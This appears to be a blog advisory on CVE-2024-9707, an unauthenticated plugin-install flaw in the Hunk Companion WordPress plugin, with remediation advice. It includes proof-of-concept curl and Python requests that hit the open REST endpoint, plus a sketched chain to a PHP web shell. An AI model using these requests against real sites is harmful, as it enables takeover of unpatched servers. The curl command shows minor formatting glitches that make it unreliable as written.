CVE-2024-9707 is a serious security bug found in the popular Hunk Companion plugin for WordPress. If your website uses this plugin (versions 1.8.4 and below), you could be exposed to attackers installing and activating plugins without any login. In the end, this can help hackers run malicious code on your server, especially if they chain this bug with vulnerabilities in other plugins.
This post breaks down how the exploit works, shows proof-of-concept code, and gives quick fixes and references. You’ll also see why small capability checks can save your site.
The Vulnerability in Simple Terms
- Plugin: WordPress Hunk Companion (WordPress.org)
Affected Versions: Up to and including 1.8.4
- Endpoint: /wp-json/hc/v1/themehunk-import (WordPress REST API)
- Problem: The endpoint doesn’t check if the caller is logged in or allowed to install/activate plugins.
References to the Bug
- Wordfence Advisory
- WPScan CVE-2024-9707 Report
- Original Changelog / Patch
How the Exploit Works
When a plugin uses WordPress REST API endpoints, it must check if the user is allowed to perform sensitive actions. The endpoint /wp-json/hc/v1/themehunk-import fails to do this. Anyone can POST to it and use it to install or activate a WordPress plugin.
It’s even possible to upload and activate a plugin that contains a backdoor or webshell. This can then be used to execute arbitrary PHP code—remote code execution (RCE)—giving the attacker full control.
Proof-of-Concept Code
Below is an example cURL command that could install & activate a plugin, if the endpoint isn’t patched:
curl -X POST "https://victim-site.com/wp-json/hc/v1/themehunk-import"; \
-H "Content-Type: application/json" \
-d '{
"action": "install_plugin",
"plugin_slug": "hello-dolly",
"activate": true
}'
If you want to do this in Python with requests
import requests
api_url = "https://victim-site.com/wp-json/hc/v1/themehunk-import";
data = {
"action": "install_plugin",
"plugin_slug": "hello-dolly",
"activate": True
}
headers = {"Content-Type": "application/json"}
resp = requests.post(api_url, json=data, headers=headers)
print(resp.text)
Note: Replace "hello-dolly" with any plugin slug available on the WordPress plugin repository. If a vulnerable plugin is installed and activated using this approach, RCE is possible.
For example
1. Install WP File Manager (had previous RCE CVEs)
Activate it via this REST API
3. Upload a PHP web shell (like b374k)
If you check the plugin’s /inc/hc-rest-api.php, you’ll find something like
register_rest_route('hc/v1', '/themehunk-import', array(
'methods' => 'POST',
'callback' => 'hc_themehunk_import_callback',
// Missing 'permission_callback'
));
There’s NO permission_callback! This means anyone can hit this endpoint.
Best practice
'permission_callback' => function () {
return current_user_can('install_plugins');
}
Check that your REST endpoints are not exposed to anonymous users for admin tasks.
- Use a security plugin like Wordfence or WPScan to watch for suspicious activity.
Conclusion
CVE-2024-9707 is a classic example of why every REST API endpoint in WordPress must check capabilities. Left open, it becomes a backdoor for attackers to install and activate any plugin—including those that can be further subverted to get full control of your server.
If you use Hunk Companion, update now! If you’re a plugin developer, never skip permission checks.
Further Reading and Resources
1. NVD CVE-2024-9707
2. WPScan Report
3. Wordfence Threat Intelligence
4. WordPress.org plugin page
5. Secure Your WordPress REST API
Timeline
Published on: 10/11/2024 13:15:21 UTC
Last modified on: 10/15/2024 12:58:51 UTC